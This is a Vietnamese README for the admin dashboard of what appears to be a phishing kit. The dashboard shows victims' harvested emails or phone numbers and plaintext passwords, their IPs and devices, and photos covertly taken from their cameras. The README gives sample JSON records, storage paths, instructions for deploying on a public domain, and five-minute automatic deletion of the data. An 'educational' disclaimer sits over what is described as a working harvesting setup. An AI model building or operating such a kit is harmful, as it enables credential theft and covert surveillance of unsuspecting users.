# Trang Admin Dashboard - Hướng dẫn sử dụng

## ⚠️ CẢNH BÁO
Trang này chỉ được tạo ra cho **mục đích giáo dục** về bảo mật và phòng chống phishing. 
**KHÔNG** sử dụng để thu thập dữ liệu trái phép từ người dùng thật.

## 📋 Chức năng

Trang admin (`admin.php`) hiển thị tất cả thông tin đã được thu thập, bao gồm:

1. **Thông tin đăng nhập:**
   - Email/Số điện thoại
   - Mật khẩu
   - Địa chỉ IP
   - Thiết bị (Desktop/Mobile/Tablet)
   - User Agent
   - Ngày giờ đăng nhập

2. **Ảnh đã chụp:**
   - Ảnh từ camera
   - Thông tin thiết bị chụp
   - Ngày giờ chụp
   - Địa chỉ IP

3. **Thống kê:**
   - Tổng số lần đăng nhập
   - Tổng số ảnh
   - Số session duy nhất
   - Số IP khác nhau

## 🚀 Cách sử dụng

1. Đảm bảo bạn đã có server PHP đang chạy (XAMPP, WAMP, hoặc server PHP tích hợp)

2. Truy cập trang admin qua trình duyệt:
   ```
   http://localhost/admin.php
   ```
   hoặc
   ```
   http://your-domain.com/admin.php
   ```

3. Trang sẽ tự động đọc dữ liệu từ:
   - `data/login_data.json` - Thông tin đăng nhập
   - `data/photo_data.json` - Thông tin ảnh
   - `uploads/` - Thư mục chứa ảnh

## 📁 Cấu trúc dữ liệu

### Dữ liệu đăng nhập (`data/login_data.json`):
```json
[
  {
    "session_id": "sess_1234567890",
    "datetime": "2025-01-XX XX:XX:XX",
    "ip": "192.168.1.1",
    "device": "Mobile",
    "user_agent": "Mozilla/5.0...",
    "email": "user@example.com",
    "password": "password123"
  }
]
```

### Dữ liệu ảnh (`data/photo_data.json`):
```json
[
  {
    "session_id": "sess_1234567890",
    "datetime": "2025-01-XX XX:XX:XX",
    "ip": "192.168.1.1",
    "device": "Mobile",
    "user_agent": "Mozilla/5.0...",
    "filename": "image_1234567890_sess_xxx.jpg",
    "filepath": "image_1234567890_sess_xxx.jpg"
  }
]
```

## 🔒 Bảo mật

**QUAN TRỌNG:** Trang admin này không có bảo mật. Nếu bạn muốn bảo vệ trang admin trong môi trường thực tế, bạn nên:

1. Thêm xác thực (username/password)
2. Chỉ cho phép truy cập từ IP cụ thể
3. Sử dụng HTTPS
4. Bảo vệ thư mục `data/` và `uploads/`

## 🗑️ Tự động xóa dữ liệu

Hệ thống tự động xóa dữ liệu cũ hơn **5 phút** từ lúc nhận được:
- ✅ Khi có dữ liệu đăng nhập mới (`login.php`)
- ✅ Khi có ảnh upload mới (`upload.php`)
- ✅ Khi load trang admin (`admin.php`)

**Lưu ý:**
- Dữ liệu được xóa tự động, không thể khôi phục
- File ảnh cũng bị xóa tự động khi dữ liệu bị xóa
- Chỉ giữ lại dữ liệu trong vòng 5 phút gần nhất

## 📝 Lưu ý

- Dữ liệu được lưu dưới dạng JSON, dễ đọc và phân tích
- Ảnh được lưu trong thư mục `uploads/`
- Session ID được dùng để liên kết ảnh với thông tin đăng nhập
- Trang hiển thị dữ liệu mới nhất trước
- Dữ liệu tự động bị xóa sau 5 phút để tiết kiệm dung lượng

## ⚖️ Trách nhiệm pháp lý

Người sử dụng trang này hoàn toàn chịu trách nhiệm về việc sử dụng nó. 
Việc thu thập dữ liệu trái phép từ người dùng là bất hợp pháp và có thể bị truy cứu trách nhiệm pháp lý.